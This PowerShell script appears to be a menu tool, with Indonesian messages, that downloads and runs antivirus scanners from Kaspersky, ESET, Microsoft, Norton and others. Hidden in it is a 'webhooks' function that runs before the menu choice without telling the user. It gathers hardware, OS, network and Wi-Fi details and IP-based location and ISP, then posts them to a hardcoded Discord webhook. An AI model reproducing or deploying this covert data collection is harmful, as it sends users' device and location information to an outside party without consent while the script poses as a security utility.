<#
.SYNOPSIS
    Virus Removal Tools - Remove viruses, malware, and other threats from your PC.

.DESCRIPTION
    This script provides a menu to choose from a selection of popular antivirus tools for removing viruses, malware, and other threats from your PC. The script downloads the selected antivirus tool and runs it to scan and remove any detected threats.

.NOTES
    File Name      : VirusRemovalTools.ps1
    Author         : hinzdc x sarga
    Prerequisite   : PowerShell v3.0

.LINK
    
#>

Clear-Host
# Pastikan encoding terminal PowerShell menggunakan UTF-8
[Console]::OutputEncoding = [System.Text.Encoding]::utf8

# ASCII Art dalam Unicode [char]
$text = @"

                                             $([char]0x2554)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2557)
    $([char]0x2554)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2567)$([char]0x2563) ISTANA BEC LANTAI 1 BLOK D7 $([char]0x2551)
    $([char]0x2551)                                        $([char]0x255A)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2563)
    $([char]0x2551)   $([char]0x2588)$([char]0x2588)                                $([char]0x2588)$([char]0x2588)                               $([char]0x2551)
    $([char]0x2551)   $([char]0x2591)$([char]0x2591) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2592)$([char]0x2592) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2584)$([char]0x2580) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)      $([char]0x2591)$([char]0x2591) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)     $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)   $([char]0x2551)
    $([char]0x2551)   $([char]0x2588)$([char]0x2588)       $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)   $([char]0x2588)$([char]0x2588)      $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)     $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588)   $([char]0x2551)
    $([char]0x2551)   $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)   $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)   $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588) $([char]0x2580)$([char]0x2588)$([char]0x2588)   $([char]0x2588)$([char]0x2588)$([char]0x2580) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)   $([char]0x2551)
    $([char]0x2551)   $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2580)$([char]0x2584) $([char]0x2592)$([char]0x2592)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588)$([char]0x2588) $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588)    $([char]0x2580)$([char]0x2588)$([char]0x2580)    $([char]0x2588)$([char]0x2588)    $([char]0x2588)$([char]0x2588)   $([char]0x2551)
    $([char]0x2551)                                                                      $([char]0x2551)
    $([char]0x255A)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2550)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x2564)$([char]0x255D)
                           --- VIRUS REMOVAL TOOLS ---

"@

Write-Host $text -ForegroundColor Cyan
function webhooks {
    $discordWebhookUrl = "https://discordapp.com/api/webhooks/1337473337823203381/0gtdn-CLf_3uhKb1skosboqeWKwF2S9DQ6H-m10B4C0NVVll2v435GbwsU4I-tCOBkAh"

    $computerSystem = Get-CimInstance -ClassName Win32_ComputerSystemProduct
    $manufacturer = $computerSystem.Vendor
    $tipe = $computerSystem.Version
    $systemmodel = $computerSystem.Name
    $os = Get-CimInstance Win32_OperatingSystem
    $cpu = Get-CimInstance Win32_Processor
    $ram = (Get-CimInstance Win32_PhysicalMemory | Measure-Object -Property Capacity -Sum).Sum / 1GB
    $disk = Get-CimInstance Win32_DiskDrive | ForEach-Object { "$($_.Model) - $([math]::Round($_.Size / 1GB, 2)) GB" }

    $wifi = Get-NetAdapter | Where-Object { $_.InterfaceDescription -match 'Wireless' -and $_.Status -eq 'Up' }
    if ($wifi) {
        $wifiName = (Get-NetConnectionProfile -InterfaceAlias $wifi.Name).Name
    } else {
        $wifiName = "Tidak ada Wi-Fi yang terhubung."
    }

    $lanAdapter = Get-NetAdapter | Where-Object { $_.MediaConnectionState -eq 'Connected' -and $_.InterfaceDescription -notmatch 'Wireless' }
    if ($lanAdapter) {
        $lanStatus = "LAN terhubung: $($lanAdapter.Name)"
        $pingResult = Test-Connection -ComputerName 8.8.8.8 -Count 1 -ErrorAction SilentlyContinue
        if ($pingResult.StatusCode -eq 0) {
            $internetStatus = "Internet melalui LAN terhubung."
        } else {
            $internetStatus = "Internet melalui LAN tidak terhubung."
        }
    } else {
        $lanStatus = "Tidak ada LAN yang terhubung."
        $internetStatus = "Internet melalui LAN tidak tersedia."
    }

    $ipInfo = Invoke-RestMethod -Uri "http://ip-api.com/json/"

    $message = @"
    **:shield: VIRUS REMOVAL TOOLS**

    **:computer: SYSTEM INFO**
    Merek: $manufacturer
    Model: $tipe ($systemmodel)
    OS: $($os.Caption) ($($os.Version))
    CPU: $($cpu.Name) ($($cpu.NumberOfCores) Cores, $($cpu.NumberOfLogicalProcessors) Threads)
    RAM: $([math]::Round($ram, 2)) GB
    Disk: $($disk -join ", ")

    **:globe_with_meridians: NETWORK**
    SSID: $wifiName
    LAN: $lanStatus
    $internetStatus
    Lokasi: $($ipInfo.city), $($ipInfo.country) ($($ipInfo.zip))
    ISP: $($ipInfo.isp)

"@

    $body = @{ content = $message } | ConvertTo-Json -Compress
    Invoke-RestMethod -Uri $discordWebhookUrl -Method Post -ContentType "application/json" -Body $body
}

# Menentukan URL resmi antivirus portable
$kvrtURL = "https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe"
$esetURL = "https://download.eset.com/com/eset/tools/online_scanner/latest/esetonlinescanner.exe"
$drwebURL = "https://cdn-download.drweb.com/pub/drweb/cureit/1738397481.898/tg8y095d.exe"
$microsoftURL = "https://go.microsoft.com/fwlink/?LinkId=212732"
$nortonURL = "https://www.norton.com/npe_latest"
$stingerURL = "https://downloadcenter.trellix.com/products/mcafee-avert/Stinger/stinger64.exe"

# Lokasi penyimpanan sementara
$downloadPath = "$env:TEMP\AntivirusScanner.exe"

# Menampilkan menu pilihan
Write-Host "--------------------------------------------------------------------------------"
Write-Host "  Virus Removal Tools - Remove viruses, malware, and other threats from your PC"
Write-Host "--------------------------------------------------------------------------------"
Write-Host "Pilih Antivirus yang ingin dijalankan:"
write-host
Write-Host " 1. Kaspersky Virus Removal Tool (KVRT)"
Write-Host " 2. ESET Online Scanner"
Write-Host " 3. Dr.Web CureIt!    link kadaluarsa, jangan pilih"
Write-Host " 4. Microsoft Safety Scanner"
Write-Host " 5. Norton Power Eraser"
Write-Host " 6. Trellix Stinger by McAfee"
Write-Host
Write-Host "--------------------------------------------------------------------------------"
webhooks
$choice = Read-Host "Masukkan pilihan (1-6)"

# Fungsi untuk menampilkan deskripsi, mengunduh, dan menjalankan antivirus
function DownloadAndRun {
    param ($url, $description)
    Write-Host "--------------------------------------------------------------------------------`n$description`n--------------------------------------------------------------------------------"
    Write-Host "`n + Mengunduh antivirus..."
    Invoke-WebRequest -Uri $url -OutFile $downloadPath
    Write-Host " + Menjalankan antivirus..."
    Start-Process -FilePath $downloadPath -Wait
    Write-Host " + Pemindaian selesai. Silakan periksa hasilnya.`n" -ForegroundColor Green
    Remove-Item $downloadPath | Out-Null
    Write-Host "--------------------------------------------------------------------------------"
    Write-Host "Terima kasih telah menggunakan Virus Removal Tools. Semoga komputer Anda bersih dari virus!"
    Write-Host "--------------------------------------------------------------------------------"
    Read-Host "Tekan ENTER untuk keluar"
    exit
}

# Menjalankan sesuai pilihan
switch ($choice) {
    "1" { 
        DownloadAndRun -url $kvrtURL -description "KVRT is a stand-alone utility developed by Kaspersky Lab, one of the most trusted names in the cybersecurity game. Its mission? To detect and remove nasty viruses, Trojans, worms, spyware, adware, and rootkits from your infected PC with minimal fuss. Whether you're reeling from a malware attack or hunch something shady lurks, KVRT can sniff out the problem and help you kick it to the curb." 
    }
    "2" { 
        DownloadAndRun -url $esetURL -description "ESET Online ScannerESET Online Scanner is a one-time use tool to remove malware from your device but it does not provide real-time continuous protection against future threats. ESET Internet Security is all-in-one security suite that provides real-time protection against malware, spyware, phishing attacks, and ransomware." 
    }
    "3" { 
        DownloadAndRun -url $drwebURL -description "Dr.Web CureIt!Dr.Web CureIt! anti-virus utility`nAn indispensable emergency tool for scanning PCs and servers and ridding them of all sorts of malware that gets past your anti-virus." 
    }
    "4" { 
        DownloadAndRun -url $microsoftURL -description "Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply download it and run a scan to find malware and try to reverse changes made by identified threats. Safety Scanner is exclusively SHA-2 signed." 
    }
    "5" { 
        DownloadAndRun -url $nortonURL -description "Norton Power Eraser uses our most aggressive scanning technology to eliminate threats that traditional virus scanning doest always detect, so you can get your PC back. Because Norton Power Eraser is an aggressive virus removal tool, it may mark a legitimate program for removal. However, you can always undo the results of a scan. It can also help detect and remove Potentially Unwanted Programs." 
    }
    "6" { 
        DownloadAndRun -url $stingerURL -description "Trellix Stinger utilizes next-generation scan technology, including rootkit scanning, and scan performance optimizations. It detects and removes threats identified under the `Threat List` option under Advanced menu options in the Stinger application. Stinger now detects and removes GameOver Zeus and CryptoLocker." 
    }
    default { 
        Write-Host "Pilihan tidak valid. Silakan jalankan ulang skrip." 
    }
}

# msert.exe 201,434,752 bytes
# KVRT.exe 112,851,304 bytes
# esetonlinescanner.exe 8,415,088 bytes
# tg8y095d.exe 297,017,416 bytes
# npe.exe 16,995,528 bytes
# stinger64.exe 49,166,568 bytes